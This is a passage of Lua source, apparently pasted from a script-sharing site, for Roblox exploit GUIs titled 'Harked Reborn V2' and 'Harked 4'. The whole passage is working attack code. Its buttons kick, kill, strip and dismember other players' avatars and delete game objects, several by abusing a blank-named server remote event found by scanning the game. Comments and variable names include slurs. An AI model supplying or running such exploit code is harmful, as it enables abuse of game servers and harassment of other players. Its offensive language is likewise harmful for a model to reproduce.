buildScript(scrSource,0,0,true) newTab.Parent = scriptBar end function updateScriptBar() local entryCount = 0 scriptBarLeft.Active = false scriptBarLeft.AutoButtonColor = false for i,v in pairs(scriptBarLeft["Arrow Graphic"]:GetChildren()) do v.BackgroundTransparency = 0.7 end scriptBarRight.Active = false scriptBarRight.AutoButtonColor = false for i,v in pairs(scriptBarRight["Arrow Graphic"]:GetChildren()) do v.BackgroundTransparency = 0.7 end for i,v in pairs(scriptBar:GetChildren()) do if v.Position.X.Offset < 0 then scriptBarLeft.Active = true scriptBarLeft.AutoButtonColor = true for i,v in pairs(scriptBarLeft["Arrow Graphic"]:GetChildren()) do v.BackgroundTransparency = 0 end elseif v.Position.X.Offset >= 0 then entryCount = entryCount + 1 if entryCount == 5 then scriptBarRight.Active = true scriptBarRight.AutoButtonColor = true for i,v in pairs(scriptBarRight["Arrow Graphic"]:GetChildren()) do v.BackgroundTransparency = 0 end end end end end scriptBar.ChildAdded:connect(updateScriptBar) scriptBar.ChildRemoved:connect(updateScriptBar) scriptBarLeft.MouseButton1Click:connect(function() if scriptBarLeft.Active == false then return end for i,v in pairs(scriptBar:GetChildren()) do v.Position = v.Position + UDim2.new(0,100,0,0) end updateScriptBar() end) scriptBarRight.MouseButton1Click:connect(function() if scriptBarRight.Active == false then return end for i,v in pairs(scriptBar:GetChildren()) do v.Position = v.Position + UDim2.new(0,-100,0,0) end updateScriptBar() end) mouse.Button1Down:connect(function() if checkMouseInGui(editorGrid) then --print("LETS EDIT!") end end) openEvent.Event:connect(function(...) top.Visible = true local args = {...} if #args > 0 then openScript(args[1]) end end) clipboardButton.MouseButton1Click:connect(function() if Clipboard and Clipboard.set then Clipboard.set(currentSource) elseif CopyString then CopyString(currentSource) end end) closeButton.MouseButton1Click:connect(function() top.Visible = false end) --[[ local scr = script.Parent:WaitForChild("Scr") local scr2 = script.Parent:WaitForChild("Scr2") local scr3 = script.Parent:WaitForChild("Scr3") local scr4 = script.Parent:WaitForChild("TOS") local scr5 = script.Parent:WaitForChild("HW") --]] buildScript("",0,0,true) --[[ openScript(scr) openScript(scr2) openScript(scr3) openScript(scr4) openScript(scr5) --]] scrollBar:Update() scrollBarH:Update() end) --moony end) slock.Name = "slock" slock.Parent = ScrollingFrame slock.BackgroundColor3 = Color3.fromRGB(172, 172, 172) slock.BackgroundTransparency = 0.500 slock.BorderSizePixel = 0 slock.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) slock.Size = UDim2.new(0, 131, 0, 40) slock.Font = Enum.Font.SourceSansLight slock.Text = "Slock" slock.TextColor3 = Color3.fromRGB(255, 255, 255) slock.TextSize = 23.000 slock.MouseButton1Click:connect(function() if slockk then queue.Text = "Reborn by c00lkidd#1483 SLOCK: false" slockk = false else queue.Text = "Reborn by c00lkidd#1483 SLOCK: true" slockk = true end end) UIGridLayout.Parent = ScrollingFrame UIGridLayout.SortOrder = Enum.SortOrder.LayoutOrder UIGridLayout.CellPadding = UDim2.new(0, 15, 0, 15) UIGridLayout.CellSize = UDim2.new(0, 131, 0, 40) kick.Name = "kick" kick.Parent = ScrollingFrame kick.BackgroundColor3 = Color3.fromRGB(172, 172, 172) kick.BackgroundTransparency = 0.500 kick.BorderSizePixel = 0 kick.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) kick.Size = UDim2.new(0, 131, 0, 40) kick.Font = Enum.Font.SourceSansLight kick.Text = "Kick" kick.TextColor3 = Color3.fromRGB(255, 255, 255) kick.TextSize = 23.000 kick.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do Destroy(Players[v]) end end) blockhead.Name = "blockhead" blockhead.Parent = ScrollingFrame blockhead.BackgroundColor3 = Color3.fromRGB(172, 172, 172) blockhead.BackgroundTransparency = 0.500 blockhead.BorderSizePixel = 0 blockhead.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) blockhead.Size = UDim2.new(0, 131, 0, 40) blockhead.Font = Enum.Font.SourceSansLight blockhead.Text = "Blockhead" blockhead.TextColor3 = Color3.fromRGB(255, 255, 255) blockhead.TextSize = 23.000 blockhead.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do Destroy(Players[v].Character.Head:FindFirstChildOfClass("SpecialMesh")) end end) stools.Name = "stools" stools.Parent = ScrollingFrame stools.BackgroundColor3 = Color3.fromRGB(172, 172, 172) stools.BackgroundTransparency = 0.500 stools.BorderSizePixel = 0 stools.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) stools.Size = UDim2.new(0, 131, 0, 40) stools.Font = Enum.Font.SourceSansLight stools.Text = "Stools" stools.TextColor3 = Color3.fromRGB(255, 255, 255) stools.TextSize = 23.000 stools.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do Destroy(Players[v].Character:FindFirstChildOfClass("Humanoid")) repeat wait() until Players[v].Character:FindFirstChildOfClass("Humanoid").Parent == nil for _, v in ipairs(Players[v].Character:GetChildren()) do if v:IsA("BackpackItem") and v:FindFirstChild("Handle") then Players.LocalPlayer.Character:FindFirstChildOfClass("Humanoid"):EquipTool(v) end end end end) noface.Name = "noface" noface.Parent = ScrollingFrame noface.BackgroundColor3 = Color3.fromRGB(172, 172, 172) noface.BackgroundTransparency = 0.500 noface.BorderSizePixel = 0 noface.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) noface.Size = UDim2.new(0, 131, 0, 40) noface.Font = Enum.Font.SourceSansLight noface.Text = "Noface" noface.TextColor3 = Color3.fromRGB(255, 255, 255) noface.TextSize = 23.000 noface.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do Destroy(Players[v].Character.Head:FindFirstChildOfClass("Decal")) end end) punish.Name = "punish" punish.Parent = ScrollingFrame punish.BackgroundColor3 = Color3.fromRGB(172, 172, 172) punish.BackgroundTransparency = 0.500 punish.BorderSizePixel = 0 punish.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) punish.Size = UDim2.new(0, 131, 0, 40) punish.Font = Enum.Font.SourceSansLight punish.Text = "Punish" punish.TextColor3 = Color3.fromRGB(255, 255, 255) punish.TextSize = 23.000 punish.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do Destroy(Players[v].Character) end end) pantsless.Name = "pantsless" pantsless.Parent = ScrollingFrame pantsless.BackgroundColor3 = Color3.fromRGB(172, 172, 172) pantsless.BackgroundTransparency = 0.500 pantsless.BorderSizePixel = 0 pantsless.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) pantsless.Size = UDim2.new(0, 131, 0, 40) pantsless.Font = Enum.Font.SourceSansLight pantsless.Text = "Pantsless" pantsless.TextColor3 = Color3.fromRGB(255, 255, 255) pantsless.TextSize = 23.000 pantsless.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do Destroy(Players[v].Character:FindFirstChildOfClass("Pants")) end end) shirtless.Name = "shirtless" shirtless.Parent = ScrollingFrame shirtless.BackgroundColor3 = Color3.fromRGB(172, 172, 172) shirtless.BackgroundTransparency = 0.500 shirtless.BorderSizePixel = 0 shirtless.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) shirtless.Size = UDim2.new(0, 131, 0, 40) shirtless.Font = Enum.Font.SourceSansLight shirtless.Text = "Shirtless" shirtless.TextColor3 = Color3.fromRGB(255, 255, 255) shirtless.TextSize = 23.000 shirtless.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do Destroy(Players[v].Character:FindFirstChildOfClass("Shirt")) end end) tshirtless.Name = "tshirtless" tshirtless.Parent = ScrollingFrame tshirtless.BackgroundColor3 = Color3.fromRGB(172, 172, 172) tshirtless.BackgroundTransparency = 0.500 tshirtless.BorderSizePixel = 0 tshirtless.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) tshirtless.Size = UDim2.new(0, 131, 0, 40) tshirtless.Font = Enum.Font.SourceSansLight tshirtless.Text = "Tshirtless" tshirtless.TextColor3 = Color3.fromRGB(255, 255, 255) tshirtless.TextSize = 23.000 tshirtless.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do Destroy(Players[v].Character:FindFirstChildOfClass("ShirtGraphic")) end end) noregen.Name = "noregen" noregen.Parent = ScrollingFrame noregen.BackgroundColor3 = Color3.fromRGB(172, 172, 172) noregen.BackgroundTransparency = 0.500 noregen.BorderSizePixel = 0 noregen.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) noregen.Size = UDim2.new(0, 131, 0, 40) noregen.Font = Enum.Font.SourceSansLight noregen.Text = "Noregen" noregen.TextColor3 = Color3.fromRGB(255, 255, 255) noregen.TextSize = 23.000 noregen.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do Destroy(Players[v].Character:FindFirstChild("Health")) end end) stopanim.Name = "stopanim" stopanim.Parent = ScrollingFrame stopanim.BackgroundColor3 = Color3.fromRGB(172, 172, 172) stopanim.BackgroundTransparency = 0.500 stopanim.BorderSizePixel = 0 stopanim.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) stopanim.Size = UDim2.new(0, 131, 0, 40) stopanim.Font = Enum.Font.SourceSansLight stopanim.Text = "Stopanim" stopanim.TextColor3 = Color3.fromRGB(255, 255, 255) stopanim.TextSize = 23.000 stopanim.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do Destroy(Players[v].Character:FindFirstChildOfClass("Humanoid"):FindFirstChildOfClass("Animator")) end end) blockchar.Name = "blockchar" blockchar.Parent = ScrollingFrame blockchar.BackgroundColor3 = Color3.fromRGB(172, 172, 172) blockchar.BackgroundTransparency = 0.500 blockchar.BorderSizePixel = 0 blockchar.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) blockchar.Size = UDim2.new(0, 131, 0, 40) blockchar.Font = Enum.Font.SourceSansLight blockchar.Text = "Blockchar" blockchar.TextColor3 = Color3.fromRGB(255, 255, 255) blockchar.TextSize = 23.000 blockchar.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do for i, v in pairs(Players[v].Character:GetChildren()) do if v:IsA("CharacterMesh") then Destroy(v) end end end end) nolimbs.Name = "nolimbs" nolimbs.Parent = ScrollingFrame nolimbs.BackgroundColor3 = Color3.fromRGB(172, 172, 172) nolimbs.BackgroundTransparency = 0.500 nolimbs.BorderSizePixel = 0 nolimbs.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) nolimbs.Size = UDim2.new(0, 131, 0, 40) nolimbs.Font = Enum.Font.SourceSansLight nolimbs.Text = "Nolimbs" nolimbs.TextColor3 = Color3.fromRGB(255, 255, 255) nolimbs.TextSize = 23.000 nolimbs.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do if Players[v].Character:FindFirstChildOfClass("Humanoid").RigType == Enum.HumanoidRigType.R6 then Destroy(Players[v].Character["Left Arm"]) Destroy(Players[v].Character["Left Leg"]) Destroy(Players[v].Character["Right Arm"]) Destroy(Players[v].Character["Right Leg"]) else Destroy(Players[v].Character["LeftUpperArm"]) Destroy(Players[v].Character["LeftUpperLeg"]) Destroy(Players[v].Character["RightUpperArm"]) Destroy(Players[v].Character["RightUpperLeg"]) end end end) nola.Name = "nola" nola.Parent = ScrollingFrame nola.BackgroundColor3 = Color3.fromRGB(172, 172, 172) nola.BackgroundTransparency = 0.500 nola.BorderSizePixel = 0 nola.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) nola.Size = UDim2.new(0, 131, 0, 40) nola.Font = Enum.Font.SourceSansLight nola.Text = "Nola" nola.TextColor3 = Color3.fromRGB(255, 255, 255) nola.TextSize = 23.000 nola.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do if Players[v].Character:FindFirstChildOfClass("Humanoid").RigType == Enum.HumanoidRigType.R6 then Destroy(Players[v].Character["Left Arm"]) else Destroy(Players[v].Character["LeftUpperArm"]) end end end) noll.Name = "noll" noll.Parent = ScrollingFrame noll.BackgroundColor3 = Color3.fromRGB(172, 172, 172) noll.BackgroundTransparency = 0.500 noll.BorderSizePixel = 0 noll.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) noll.Size = UDim2.new(0, 131, 0, 40) noll.Font = Enum.Font.SourceSansLight noll.Text = "Noll" noll.TextColor3 = Color3.fromRGB(255, 255, 255) noll.TextSize = 23.000 noll.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do if Players[v].Character:FindFirstChildOfClass("Humanoid").RigType == Enum.HumanoidRigType.R6 then Destroy(Players[v].Character["Left Leg"]) else Destroy(Players[v].Character["LeftUpperLeg"]) end end end) nora.Name = "nora" nora.Parent = ScrollingFrame nora.BackgroundColor3 = Color3.fromRGB(172, 172, 172) nora.BackgroundTransparency = 0.500 nora.BorderSizePixel = 0 nora.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) nora.Size = UDim2.new(0, 131, 0, 40) nora.Font = Enum.Font.SourceSansLight nora.Text = "Nora" nora.TextColor3 = Color3.fromRGB(255, 255, 255) nora.TextSize = 23.000 nora.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do if Players[v].Character:FindFirstChildOfClass("Humanoid").RigType == Enum.HumanoidRigType.R6 then Destroy(Players[v].Character["Right Arm"]) else Destroy(Players[v].Character["RightUpperArm"]) end end end) norl.Name = "norl" norl.Parent = ScrollingFrame norl.BackgroundColor3 = Color3.fromRGB(172, 172, 172) norl.BackgroundTransparency = 0.500 norl.BorderSizePixel = 0 norl.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) norl.Size = UDim2.new(0, 131, 0, 40) norl.Font = Enum.Font.SourceSansLight norl.Text = "Norl" norl.TextColor3 = Color3.fromRGB(255, 255, 255) norl.TextSize = 23.000 norl.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do if Players[v].Character:FindFirstChildOfClass("Humanoid").RigType == Enum.HumanoidRigType.R6 then Destroy(Players[v].Character["Right Leg"]) else Destroy(Players[v].Character["RightUpperLeg"]) end end end) nowaist.Name = "nowaist" nowaist.Parent = ScrollingFrame nowaist.BackgroundColor3 = Color3.fromRGB(172, 172, 172) nowaist.BackgroundTransparency = 0.500 nowaist.BorderSizePixel = 0 nowaist.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) nowaist.Size = UDim2.new(0, 131, 0, 40) nowaist.Font = Enum.Font.SourceSansLight nowaist.Text = "Nowaist" nowaist.TextColor3 = Color3.fromRGB(255, 255, 255) nowaist.TextSize = 23.000 nowaist.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do if Players[v].Character:FindFirstChildOfClass("Humanoid").RigType == Enum.HumanoidRigType.R15 then Destroy(Players[v].Character.UpperTorso.Waist) end end end) noroot.Name = "noroot" noroot.Parent = ScrollingFrame noroot.BackgroundColor3 = Color3.fromRGB(172, 172, 172) noroot.BackgroundTransparency = 0.500 noroot.BorderSizePixel = 0 noroot.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) noroot.Size = UDim2.new(0, 131, 0, 40) noroot.Font = Enum.Font.SourceSansLight noroot.Text = "Noroot" noroot.TextColor3 = Color3.fromRGB(255, 255, 255) noroot.TextSize = 23.000 noroot.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do if Players[v].Character:FindFirstChildOfClass("Humanoid").RigType == Enum.HumanoidRigType.R15 then Destroy(Players[v].Character.LowerTorso.Root) end end end) top_2.Name = "top" top_2.Parent = top top_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) top_2.BackgroundTransparency = 1.000 top_2.Position = UDim2.new(0.154639184, 0, -0.333333343, 0) top_2.Size = UDim2.new(0, 200, 0, 50) top_2.Font = Enum.Font.SourceSansLight top_2.Text = "Harked Reborn V2" top_2.TextColor3 = Color3.fromRGB(255, 255, 255) top_2.TextSize = 45.000 credits.Name = "credits" credits.Parent = top credits.BackgroundColor3 = Color3.fromRGB(255, 255, 255) credits.BackgroundTransparency = 1.000 credits.Position = UDim2.new(0, 0, 1, 0) credits.Size = UDim2.new(0, 291, 0, 23) credits.Font = Enum.Font.SourceSansLight credits.Text = "Script by c00lkidd#1483, UI by Unverified" credits.TextColor3 = Color3.fromRGB(255, 255, 255) credits.TextSize = 17.000 credits.TextWrapped = true queue.Name = "queue" queue.Parent = top queue.BackgroundColor3 = Color3.fromRGB(255, 255, 255) queue.BackgroundTransparency = 1.000 queue.Position = UDim2.new(0, 0, 10.0333338, 0) queue.Size = UDim2.new(0, 292, 0, 23) queue.Font = Enum.Font.SourceSans queue.Text = "Reborn by c00lkidd#1483 SLOCK: false" queue.TextColor3 = Color3.fromRGB(255, 0, 4) queue.TextSize = 20.000 queue.TextWrapped = true target.Name = "target" target.Parent = top target.BackgroundColor3 = Color3.fromRGB(172, 172, 172) target.BackgroundTransparency = 0.400 target.Position = UDim2.new(0.0206185561, 0, 8.86666584, 0) target.Size = UDim2.new(0, 278, 0, 33) target.Font = Enum.Font.SourceSans target.Text = "" target.TextColor3 = Color3.fromRGB(255, 255, 255) target.TextSize = 23.000 local selectionbox = Instance.new("SelectionBox", workspace) local equipped = false local oldmouse = mouse.Icon local destroytool = Instance.new("Tool", Players.LocalPlayer:FindFirstChildOfClass("Backpack")) destroytool.RequiresHandle = false destroytool.Name = "Delete" destroytool.ToolTip = "from Harked Reborn V2" destroytool.TextureId = "http://www.roblox.com/asset/?id=12223874" destroytool.CanBeDropped = false destroytool.Equipped:connect(function() equipped = true mouse.Icon = "rbxasset://textures\\HammerCursor.png" while equipped do selectionbox.Adornee = mouse.Target wait() end end) destroytool.Unequipped:connect(function() equipped = false selectionbox.Adornee = nil mouse.Icon = oldmouse print(oldmouse) end) destroytool.Activated:connect(function() local explosion = Instance.new("Explosion", workspace) explosion.BlastPressure = 0 explosion.BlastRadius = 0 explosion.DestroyJointRadiusPercent = 0 explosion.ExplosionType = Enum.ExplosionType.NoCraters explosion.Position = mouse.Target.Position Destroy(mouse.Target) end) game:GetService("StarterGui"):SetCoreGuiEnabled('Backpack', true) Players.LocalPlayer.CharacterAdded:connect(function() local destroytool = Instance.new("Tool", Players.LocalPlayer:FindFirstChildOfClass("Backpack")) destroytool.RequiresHandle = false destroytool.Name = "Delete" destroytool.ToolTip = "from Harked Reborn V2" destroytool.TextureId = "http://www.roblox.com/asset/?id=12223874" destroytool.CanBeDropped = false destroytool.Equipped:connect(function() equipped = true mouse.Icon = "rbxasset://textures\\HammerCursor.png" while equipped do selectionbox.Adornee = mouse.Target wait() end end) destroytool.Unequipped:connect(function() equipped = false selectionbox.Adornee = nil mouse.Icon = oldmouse print(oldmouse) end) destroytool.Activated:connect(function() local explosion = Instance.new("Explosion", workspace) explosion.BlastPressure = 0 explosion.BlastRadius = 0 explosion.DestroyJointRadiusPercent = 0 explosion.ExplosionType = Enum.ExplosionType.NoCraters explosion.Position = mouse.Target.Position Destroy(mouse.Target) end) game:GetService("StarterGui"):SetCoreGuiEnabled('Backpack', true) end) end }) GUIS:AddButton({ Title = "Harked 4", Description = "Harked 4", Callback = function() --[[ WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk! ]] local main = Instance.new("ScreenGui") local top = Instance.new("Frame") local back = Instance.new("Frame") local kill = Instance.new("TextButton") local btools = Instance.new("TextButton") local top_2 = Instance.new("TextLabel") local naked = Instance.new("TextButton") local credits = Instance.new("TextLabel") local hatless = Instance.new("TextButton") local sink = Instance.new("TextButton") local nuke = Instance.new("TextButton") local kick = Instance.new("TextButton") local target = Instance.new("TextBox") local queue = Instance.new("TextLabel") local nolimbs = Instance.new("TextButton") --Properties: main.Name = "main" main.Parent = game:GetService("Players").LocalPlayer:WaitForChild("PlayerGui") top.Name = "top" top.Parent = main top.Draggable = true top.Active = true top.BackgroundColor3 = Color3.new(0.188235, 0.188235, 0.188235) top.BackgroundTransparency = 0.30000001192093 top.BorderColor3 = Color3.new(0.117647, 0.117647, 0.117647) top.Position = UDim2.new(0.612145662, 0, 0.311965823, 0) top.Size = UDim2.new(0, 291, 0, 30) back.Name = "back" back.Parent = top back.BackgroundColor3 = Color3.new(0.188235, 0.188235, 0.188235) back.BackgroundTransparency = 0.30000001192093 back.BorderColor3 = Color3.new(0.117647, 0.117647, 0.117647) back.BorderSizePixel = 0 back.Position = UDim2.new(-0.00343642617, 0, 1, 0) back.Size = UDim2.new(0, 293, 0, 293) kill.Name = "kill" kill.Parent = top kill.BackgroundColor3 = Color3.new(0.67451, 0.67451, 0.67451) kill.BackgroundTransparency = 0.5 kill.BorderSizePixel = 0 kill.Position = UDim2.new(0.0206185561, 0, 1.76666665, 0) kill.Size = UDim2.new(0, 134, 0, 40) kill.Font = Enum.Font.SourceSansLight kill.Text = "Kill" kill.TextColor3 = Color3.new(1, 1, 1) kill.TextSize = 23 btools.Name = "btools" btools.Parent = top btools.BackgroundColor3 = Color3.new(0.67451, 0.67451, 0.67451) btools.BackgroundTransparency = 0.5 btools.BorderSizePixel = 0 btools.Position = UDim2.new(0.525773168, 0, 1.76666665, 0) btools.Size = UDim2.new(0, 131, 0, 40) btools.Font = Enum.Font.SourceSansLight btools.Text = "Btools" btools.TextColor3 = Color3.new(1, 1, 1) btools.TextSize = 23 top_2.Name = "top" top_2.Parent = top top_2.BackgroundColor3 = Color3.new(1, 1, 1) top_2.BackgroundTransparency = 1 top_2.Position = UDim2.new(0.154639184, 0, -0.333333343, 0) top_2.Size = UDim2.new(0, 200, 0, 50) top_2.Font = Enum.Font.SourceSansLight top_2.Text = "Harked" top_2.TextColor3 = Color3.new(1, 1, 1) top_2.TextSize = 45 naked.Name = "naked" naked.Parent = top naked.BackgroundColor3 = Color3.new(0.67451, 0.67451, 0.67451) naked.BackgroundTransparency = 0.5 naked.BorderSizePixel = 0 naked.Position = UDim2.new(0.0206185561, 0, 3.56217241, 0) naked.Size = UDim2.new(0, 134, 0, 40) naked.Font = Enum.Font.SourceSansLight naked.Text = "Naked" naked.TextColor3 = Color3.new(1, 1, 1) naked.TextSize = 23 credits.Name = "credits" credits.Parent = top credits.BackgroundColor3 = Color3.new(1, 1, 1) credits.BackgroundTransparency = 1 credits.Position = UDim2.new(0, 0, 1, 0) credits.Size = UDim2.new(0, 291, 0, 23) credits.Font = Enum.Font.SourceSansLight credits.Text = "Commands/Scripts by Dong , UI by Unverified" credits.TextColor3 = Color3.new(1, 1, 1) credits.TextSize = 17 credits.TextWrapped = true hatless.Name = "hatless" hatless.Parent = top hatless.BackgroundColor3 = Color3.new(0.67451, 0.67451, 0.67451) hatless.BackgroundTransparency = 0.5 hatless.BorderSizePixel = 0 hatless.Position = UDim2.new(0.0206185561, 0, 5.39550591, 0) hatless.Size = UDim2.new(0, 134, 0, 40) hatless.Font = Enum.Font.SourceSansLight hatless.Text = "Hatless" hatless.TextColor3 = Color3.new(1, 1, 1) hatless.TextSize = 23 sink.Name = "sink" sink.Parent = top sink.BackgroundColor3 = Color3.new(0.67451, 0.67451, 0.67451) sink.BackgroundTransparency = 0.5 sink.BorderSizePixel = 0 sink.Position = UDim2.new(0.525773168, 0, 5.39550591, 0) sink.Size = UDim2.new(0, 131, 0, 40) sink.Font = Enum.Font.SourceSansLight sink.Text = "Sink" sink.TextColor3 = Color3.new(1, 1, 1) sink.TextSize = 23 nuke.Name = "nuke" nuke.Parent = top nuke.BackgroundColor3 = Color3.new(0.67451, 0.67451, 0.67451) nuke.BackgroundTransparency = 0.5 nuke.BorderSizePixel = 0 nuke.Position = UDim2.new(0.525773168, 0, 7.1955061, 0) nuke.Size = UDim2.new(0, 131, 0, 40) nuke.Font = Enum.Font.SourceSansLight nuke.Text = "Nuke" nuke.TextColor3 = Color3.new(1, 1, 1) nuke.TextSize = 23 kick.Name = "kick" kick.Parent = top kick.BackgroundColor3 = Color3.new(0.67451, 0.67451, 0.67451) kick.BackgroundTransparency = 0.5 kick.BorderSizePixel = 0 kick.Position = UDim2.new(0.0206185561, 0, 7.1955061, 0) kick.Size = UDim2.new(0, 134, 0, 40) kick.Font = Enum.Font.SourceSansLight kick.Text = "Kick" kick.TextColor3 = Color3.new(1, 1, 1) kick.TextSize = 23 target.Name = "target" target.Parent = top target.BackgroundColor3 = Color3.new(0.67451, 0.67451, 0.67451) target.BackgroundTransparency = 0.40000000596046 target.Position = UDim2.new(0.0206185561, 0, 8.86666584, 0) target.Size = UDim2.new(0, 278, 0, 33) target.Font = Enum.Font.SourceSans target.Text = "" target.TextColor3 = Color3.new(1, 1, 1) target.TextSize = 23 queue.Name = "queue" queue.Parent = top queue.BackgroundColor3 = Color3.new(1, 1, 1) queue.BackgroundTransparency = 1 queue.Position = UDim2.new(0.15463917, 0, 10.0333328, 0) queue.Size = UDim2.new(0, 201, 0, 23) queue.Font = Enum.Font.SourceSans queue.Text = "Replication Queue: 0" queue.TextColor3 = Color3.new(1, 0, 0.0156863) queue.TextSize = 20 queue.TextWrapped = true nolimbs.Name = "nolimbs" nolimbs.Parent = top nolimbs.BackgroundColor3 = Color3.new(0.67451, 0.67451, 0.67451) nolimbs.BackgroundTransparency = 0.5 nolimbs.BorderSizePixel = 0 nolimbs.Position = UDim2.new(0.525773168, 0, 3.56217265, 0) nolimbs.Size = UDim2.new(0, 131, 0, 40) nolimbs.Font = Enum.Font.SourceSansLight nolimbs.Text = "NoLimbs" nolimbs.TextColor3 = Color3.new(1, 1, 1) nolimbs.TextSize = 23 -- SLAVE'S WORK -- for i,slaves in pairs(game:GetDescendants()) do if slaves.Name == "" then print("no u") kill.MouseButton1Down:connect(function() if string.lower(target.Text) == "all" then for i,c in pairs(game:GetService("Players"):GetPlayers()) do ohok = c.Character["Head"] slaves:FireServer(ohok, {Value = ohok}) end else if game:GetService("Players"):FindFirstChild(target.Text) then if game:GetService("Players"):FindFirstChild(target.Text).Character then slaves:FireServer(game:GetService("Players"):FindFirstChild(target.Text).Character.Head, {Value = game:GetService("Players"):FindFirstChild(target.Text).Character.Head}) else print("nibba who this") end end end end) btools.MouseButton1Down:connect(function() local Tool = Instance.new("Tool",game:GetService("Players").LocalPlayer.Backpack) local Equipped = false Tool.RequiresHandle = false Tool.Name = "Destroy Tool" local Field = Instance.new("SelectionBox",game:GetService("Workspace")) local Mouse = game:GetService("Players").LocalPlayer:GetMouse() Field.LineThickness = 0.1 Tool.Equipped:connect(function() Equipped = true while Equipped == true do if Mouse.Target ~= nil then Field.Adornee = Mouse.Target else Field.Adornee = nil end wait() end end) Tool.Unequipped:connect(function() Equipped = false Field.Adornee = nil end) Tool.Activated:connect(function() if Mouse.Target ~= nil then slaves:FireServer(Mouse.Target, {Value = Mouse.Target}) local AttemptTarget = Mouse.Target while AttemptTarget ~= nil do AttemptTarget.Velocity = Vector3.new(0,-1000000000000000,0) AttemptTarget.CanCollide = false wait() end end end) end) naked.MouseButton1Down:connect(function() if string.lower(target.Text) == "all" then for i,c in pairs(game:GetService("Players"):GetPlayers()) do ohok = c.Character.Shirt ohoka = c.Character.Pants slaves:FireServer(ohok, {Value = ohok}) slaves:FireServer(ohoka, {Value = ohoka}) end else slaves:FireServer(game:GetService("Players"):FindFirstChild(target.Text).Character.Shirt, {Value = game:GetService("Players"):FindFirstChild(target.Text).Character.Shirt}) slaves:FireServer(game:GetService("Players"):FindFirstChild(target.Text).Character.Pants, {Value = game:GetService("Players"):FindFirstChild(target.Text).Character.Pants}) end end) nolimbs.MouseButton1Down:connect(function() if string.lower(target.Text) == "all" then for i,c in pairs(game:GetService("Players"):GetPlayers()) do ohok = c.Character["Right Arm"] ohoka = c.Character["Left Arm"] ohokb = c.Character["Right Leg"] ohokc = c.Character["Left Leg"] slaves:FireServer(ohok, {Value = ohok}) slaves:FireServer(ohoka, {Value = ohoka}) slaves:FireServer(ohokb, {Value = ohokb}) slaves:FireServer(ohokc, {Value = ohokc}) end else slaves:FireServer(game:GetService("Players"):FindFirstChild(target.Text).Character["Right Arm"], {Value = game:GetService("Players"):FindFirstChild(target.Text).Character["Right Arm"]}) slaves:FireServer(game:GetService("Players"):FindFirstChild(target.Text).Character["Right Leg"], {Value = game:GetService("Players"):FindFirstChild(target.Text).Character["Right Leg"]}) slaves:FireServer(game:GetService("Players"):FindFirstChild(target.Text).Character["Left Arm"], {Value = game:GetService("Players"):FindFirstChild(target.Text).Character["Left Arm"]}) slaves:FireServer(game:GetService("Players"):FindFirstChild(target.Text).Character["Left Leg"], {Value = game:GetService("Players"):FindFirstChild(target.Text).Character["Left Leg"]}) end end) hatless.MouseButton1Down:connect(function() if string.lower(target.Text) == "all" then for i,x in pairs(game:GetService("Players"):GetPlayers()) do for i,c in pairs(x.Character:GetChildren()) do if c:IsA("Accessory") then ohok = c slaves:FireServer(ohok, {Value = ohok}) end end end else for i, hats in pairs(game:GetService("Players"):FindFirstChild(target.Text).Character:GetChildren()) do if hats:IsA("Accessory") then slaves:FireServer(hats, {Value = hats }) end end end end) sink.MouseButton1Down:connect(function() if string.lower(target.Text) == "all" then for i,c in pairs(game:GetService("Players"):GetPlayers()) do ohok = c.Character.HumanoidRootPart slaves:FireServer(ohok, {Value = ohok}) end else slaves:FireServer(game:GetService("Players"):FindFirstChild(target.Text).Character["HumanoidRootPart"], {Value = game:GetService("Players"):FindFirstChild(target.Text).Character["HumanoidRootPart"]}) end end) kick.MouseButton1Down:connect(function() if 